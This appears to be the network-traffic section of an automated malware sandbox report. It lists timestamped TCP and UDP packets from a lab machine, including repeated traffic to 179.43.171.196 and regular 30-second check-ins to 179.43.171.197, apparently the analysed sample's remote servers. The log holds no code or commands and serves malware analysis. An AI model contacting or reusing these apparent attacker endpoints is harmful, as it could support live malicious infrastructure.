                                                                                                                                                              Nov 21, 2024 11:27:43.232803106 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.232855082 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.233179092 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.233232975 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.233279943 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.234060049 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.234095097 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.234147072 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.235213995 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.235274076 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.235327959 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.236248970 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.236406088 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.236474037 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.237199068 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.237330914 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.237406969 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.238475084 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.238533974 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.238600016 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.239429951 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.239563942 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.239639044 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.240463972 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.240573883 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.240648031 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.241559982 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.241688967 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.241761923 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.242631912 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.242737055 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.242810965 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.243709087 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.243769884 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.243834972 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.244812965 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.244940996 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.245012999 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.245841980 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.245959997 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.246032000 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.247104883 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.247230053 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.247292042 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.248028994 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.248130083 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.248203993 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.249109983 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.249192953 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.249260902 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.250189066 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.250238895 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.250304937 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.251276016 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.251399040 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.251493931 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.252446890 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.252522945 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.252582073 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.253458023 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.253597021 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.253659010 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.254528999 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.254647970 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.254709005 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.255614996 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.255709887 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.255770922 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.256705999 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.256822109 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.256894112 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.257823944 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.257875919 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.257942915 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.258918047 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.259120941 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.259196043 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.259964943 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.260107040 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.260179043 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.261065960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.261161089 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.261228085 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.262221098 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.262324095 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.262409925 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.263242960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.263379097 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.263448000 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.264309883 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.264431000 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.264501095 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.265403032 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.265625000 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.265708923 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.266524076 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.266583920 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.266633987 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.267585993 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.267697096 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.267749071 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.268691063 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.268913031 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.268979073 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.269902945 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.269954920 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.270004034 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.270828009 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.270929098 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.270984888 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.271943092 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.272069931 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.272130013 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.272994041 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.273103952 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.273153067 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.274076939 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.274197102 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.274243116 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.275223017 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.275367022 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.275424004 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.276246071 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.276369095 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.276408911 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.277370930 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.277479887 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.277527094 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.278424978 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.278546095 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.278615952 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.279495955 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.279613972 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.279664993 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.280582905 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.280713081 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.280756950 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.281681061 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.281812906 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.281857967 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.282746077 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.282895088 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.282942057 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.283837080 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.329299927 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.418308973 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.418374062 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.418435097 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.418992996 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.419193983 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.419235945 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.420516968 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.420571089 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.420608044 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.421207905 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.421467066 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.421504021 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.421622038 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.422408104 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.422454119 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.422483921 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.423480034 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.423521042 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.423624039 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.424592972 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.424629927 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.424911976 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.425137043 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.425172091 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.425981998 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.426099062 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.426136971 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.427063942 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.427175999 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.427212000 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.428143978 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.428457022 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.428509951 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.565766096 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.685338974 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.685520887 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.808263063 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.120212078 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.120248079 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.120321989 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.120332003 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.121269941 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.121309996 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.121501923 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.121673107 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.121704102 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.122289896 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.122351885 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.122383118 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.122797012 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.122967005 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.122998953 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.123738050 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.123955011 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.123987913 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.124000072 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.124608040 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.124640942 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.124646902 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.125155926 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.125190973 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.125485897 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.125610113 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.125643015 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.126368046 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.126451969 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.126482964 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.127414942 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.127535105 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.127564907 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.128479004 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.173026085 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.295793056 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.396315098 CET44349740179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.396595001 CET49740443192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.401081085 CET49740443192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.401092052 CET44349740179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.401484966 CET44349740179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.403050900 CET49740443192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.418695927 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.418761969 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.447333097 CET44349740179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.540762901 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.848042011 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.848069906 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.848113060 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.848150015 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.848197937 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.848226070 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.848263979 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:44.967978954 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:44.968014002 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:28:06.492043972 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:28:06.494342089 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:28:06.615113020 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:28:36.565303087 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:28:36.613106012 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:28:36.732742071 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:28:44.985904932 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:28:45.470071077 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:28:46.173247099 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:28:47.470166922 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:28:49.985687017 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:28:54.970175982 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:29:04.579682112 CET4971780192.168.2.9178.237.33.50
                                                                                                                                                              Nov 21, 2024 11:29:06.615675926 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:29:06.618191004 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:29:06.738414049 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:29:36.695317984 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:29:36.722345114 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:29:36.841972113 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:30:06.740603924 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:30:06.741947889 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:30:06.861865997 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:30:36.811620951 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:30:36.814805984 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:30:36.938261032 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:31:06.869218111 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:31:06.874459028 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:31:06.995177031 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:31:36.955697060 CET339349713179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:31:37.002933979 CET497133393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:31:37.122569084 CET339349713179.43.171.197192.168.2.9

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Nov 21, 2024 11:26:51.066031933 CET5668153192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:26:51.315473080 CET53566811.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:55.007359028 CET5559953192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:26:55.234137058 CET53555991.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:13.991122007 CET6540753192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:13.992580891 CET5904953192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:13.992774963 CET5179153192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:13.992835045 CET5367253192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:13.993098974 CET6104953192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:13.993211031 CET4995153192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:14.219158888 CET53590491.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:14.219232082 CET53610491.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:14.219321966 CET53536721.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:14.220230103 CET53499511.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:14.232342958 CET53517911.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:14.233165979 CET49952123192.168.2.962.149.0.30
                                                                                                                                                              Nov 21, 2024 11:27:14.233216047 CET49952123192.168.2.9193.171.23.163
                                                                                                                                                              Nov 21, 2024 11:27:14.233261108 CET49952123192.168.2.9169.229.128.134
                                                                                                                                                              Nov 21, 2024 11:27:14.233366966 CET49952123192.168.2.961.205.120.130
                                                                                                                                                              Nov 21, 2024 11:27:14.233436108 CET49952123192.168.2.9129.6.15.28
                                                                                                                                                              Nov 21, 2024 11:27:15.406920910 CET12349952129.6.15.28192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:15.435117006 CET12349952169.229.128.134192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:15.460308075 CET12349952193.171.23.163192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:15.471101046 CET1234995262.149.0.30192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:15.573987961 CET1234995261.205.120.130192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:20.473581076 CET53629661.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:20.842323065 CET53493231.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.099360943 CET6207753192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:27.099833965 CET6154553192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:27.100174904 CET5233453192.168.2.91.1.1.1
                                                                                                                                                              Nov 21, 2024 11:27:27.100630999 CET5391953192.168.2.91.1.1.1
